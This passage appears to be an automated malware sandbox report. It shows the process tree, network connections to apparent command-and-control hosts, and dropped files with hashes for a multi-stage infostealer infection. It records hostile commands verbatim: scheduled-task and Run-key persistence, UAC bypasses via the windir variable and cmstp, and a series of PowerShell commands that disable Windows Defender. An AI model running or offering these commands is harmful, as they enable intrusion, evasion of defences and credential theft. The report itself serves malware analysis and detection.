| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" | C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"
C:\ProgramData\GFDyrtucbvfdg.exe
"C:\ProgramData\GFDyrtucbvfdg.exe"
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"
C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"
C:\ProgramData\GFDyrtucbvfdg.exe
"C:\ProgramData\GFDyrtucbvfdg.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 3620 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\852648917343331\\* & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 3620
C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
"C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe"
C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe
"C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe"
C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
"C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe"
C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
"C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe"
C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
"C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\SysWOW64\mobsync.exe
C:\Windows\System32\mobsync.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Trast.bat" "
C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
"C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
C:\Windows\SysWOW64\reg.exe
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nest.bat" "
C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
"{path}"
C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
"{path}"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDD03.tmp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
\??\c:\windows\SysWOW64\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\i2gwbrqy.inf
C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
"{path}"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Windows\temp\h3gk1fsv.exe
C:\Windows\temp\h3gk1fsv.exe
C:\Windows\temp\h3gk1fsv.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cmstp.exe /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | telete.in | udp |
| N/A | 195.201.225.248:443 | telete.in | tcp |
| N/A | 8.8.8.8:53 | danielmi.ac.ug | udp |
| N/A | 8.8.8.8:53 | danielmax.ac.ug | udp |
| N/A | 185.215.113.77:80 | danielmax.ac.ug | tcp |
| N/A | 185.215.113.77:80 | danielmax.ac.ug | tcp |
| N/A | 45.67.231.40:80 | 45.67.231.40 | tcp |
| N/A | 185.215.113.77:80 | danielmax.ac.ug | tcp |
| N/A | 8.8.8.8:53 | cdn.discordapp.com | udp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | sergio.ac.ug | udp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | sergio.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | icacxndo.ac.ug | udp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 8.8.8.8:53 | icando.ug | udp |
| N/A | 8.8.8.8:53 | icando.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | icando.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | icando.ug | udp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
Files
memory/3728-116-0x0000000000680000-0x0000000000681000-memory.dmp
memory/2724-117-0x0000000000000000-mapping.dmp
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
memory/3172-122-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
memory/2724-127-0x00000000004D0000-0x00000000004D1000-memory.dmp
memory/3172-128-0x00000000007C0000-0x00000000007C1000-memory.dmp
memory/212-129-0x000000000044003F-mapping.dmp
memory/3728-130-0x0000000003550000-0x0000000003558000-memory.dmp
memory/3620-131-0x0000000000417A8B-mapping.dmp
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
memory/1392-133-0x000000000041A684-mapping.dmp
memory/212-136-0x00000000005E0000-0x000000000072A000-memory.dmp
memory/212-135-0x0000000000400000-0x0000000000495000-memory.dmp
memory/3620-137-0x0000000000400000-0x0000000000434000-memory.dmp
memory/3620-138-0x00000000001F0000-0x00000000001F1000-memory.dmp
memory/1392-139-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1392-140-0x0000000002010000-0x0000000002011000-memory.dmp
\Users\Admin\AppData\LocalLow\sqlite3.dll
| MD5 | f964811b68f9f1487c2b41e1aef576ce |
| SHA1 | b423959793f14b1416bc3b7051bed58a1034025f |
| SHA256 | 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7 |
| SHA512 | 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4 |
\ProgramData\sqlite3.dll
| MD5 | e477a96c8f2b18d6b5c27bde49c990bf |
| SHA1 | e980c9bf41330d1e5bd04556db4646a0210f7409 |
| SHA256 | 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660 |
| SHA512 | 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c |
\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
| MD5 | 02cc7b8ee30056d5912de54f1bdfc219 |
| SHA1 | a6923da95705fb81e368ae48f93d28522ef552fb |
| SHA256 | 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5 |
| SHA512 | 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
| MD5 | eae9273f8cdcf9321c6c37c244773139 |
| SHA1 | 8378e2a2f3635574c106eea8419b5eb00b8489b0 |
| SHA256 | a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc |
| SHA512 | 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
| MD5 | 4e8df049f3459fa94ab6ad387f3561ac |
| SHA1 | 06ed392bc29ad9d5fc05ee254c2625fd65925114 |
| SHA256 | 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871 |
| SHA512 | 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
| MD5 | 60acd24430204ad2dc7f148b8cfe9bdc |
| SHA1 | 989f377b9117d7cb21cbe92a4117f88f9c7693d9 |
| SHA256 | 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97 |
| SHA512 | 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
| MD5 | 60acd24430204ad2dc7f148b8cfe9bdc |
| SHA1 | 989f377b9117d7cb21cbe92a4117f88f9c7693d9 |
| SHA256 | 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97 |
| SHA512 | 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01 |
memory/3856-150-0x0000000000000000-mapping.dmp
memory/8-151-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
memory/3732-152-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
memory/3524-155-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe
| MD5 | 457e1bf09958f400b72e470e672dad6b |
| SHA1 | 15e2efa61dc81321614dfb32b45901b938f001d1 |
| SHA256 | d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee |
| SHA512 | 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7 |
C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe
| MD5 | 457e1bf09958f400b72e470e672dad6b |
| SHA1 | 15e2efa61dc81321614dfb32b45901b938f001d1 |
| SHA256 | d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee |
| SHA512 | 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7 |
memory/3732-158-0x0000000000200000-0x0000000000201000-memory.dmp
memory/3728-160-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
| MD5 | df5e3ee9a6098d1e29b31603672d5a8f |
| SHA1 | 0af2378effff0a7451317874efe4e6682365c03e |
| SHA256 | fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2 |
| SHA512 | 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9 |
C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
| MD5 | df5e3ee9a6098d1e29b31603672d5a8f |
| SHA1 | 0af2378effff0a7451317874efe4e6682365c03e |
| SHA256 | fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2 |
| SHA512 | 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9 |
memory/3728-163-0x0000000000690000-0x0000000000691000-memory.dmp
memory/3524-165-0x00000000004C0000-0x000000000060A000-memory.dmp
memory/3732-166-0x0000000004A40000-0x0000000004AA6000-memory.dmp
memory/3732-167-0x0000000007460000-0x0000000007461000-memory.dmp
memory/3728-168-0x0000000004EC0000-0x0000000004F20000-memory.dmp
memory/1192-170-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
| MD5 | 6439889cfd410e3b57422781c93e26cf |
| SHA1 | 12280091094281fa60fa8321006abfc7c4bd4e33 |
| SHA256 | c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d |
| SHA512 | 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e |
C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
| MD5 | 6439889cfd410e3b57422781c93e26cf |
| SHA1 | 12280091094281fa60fa8321006abfc7c4bd4e33 |
| SHA256 | c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d |
| SHA512 | 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e |
memory/3728-172-0x0000000007510000-0x0000000007511000-memory.dmp
memory/1192-175-0x0000000000E80000-0x0000000000E81000-memory.dmp
memory/1344-178-0x0000000000000000-mapping.dmp
memory/1264-177-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/3728-181-0x0000000007480000-0x0000000007481000-memory.dmp
memory/1192-183-0x0000000005690000-0x00000000056F0000-memory.dmp
memory/3728-184-0x0000000004F50000-0x0000000004F51000-memory.dmp
memory/3732-186-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
memory/1264-188-0x00000000004C0000-0x000000000060A000-memory.dmp
memory/2372-190-0x0000000000000000-mapping.dmp
memory/3732-191-0x00000000023E0000-0x00000000023E2000-memory.dmp
memory/3732-193-0x0000000004C80000-0x0000000004C81000-memory.dmp
memory/1192-196-0x0000000005710000-0x0000000005711000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
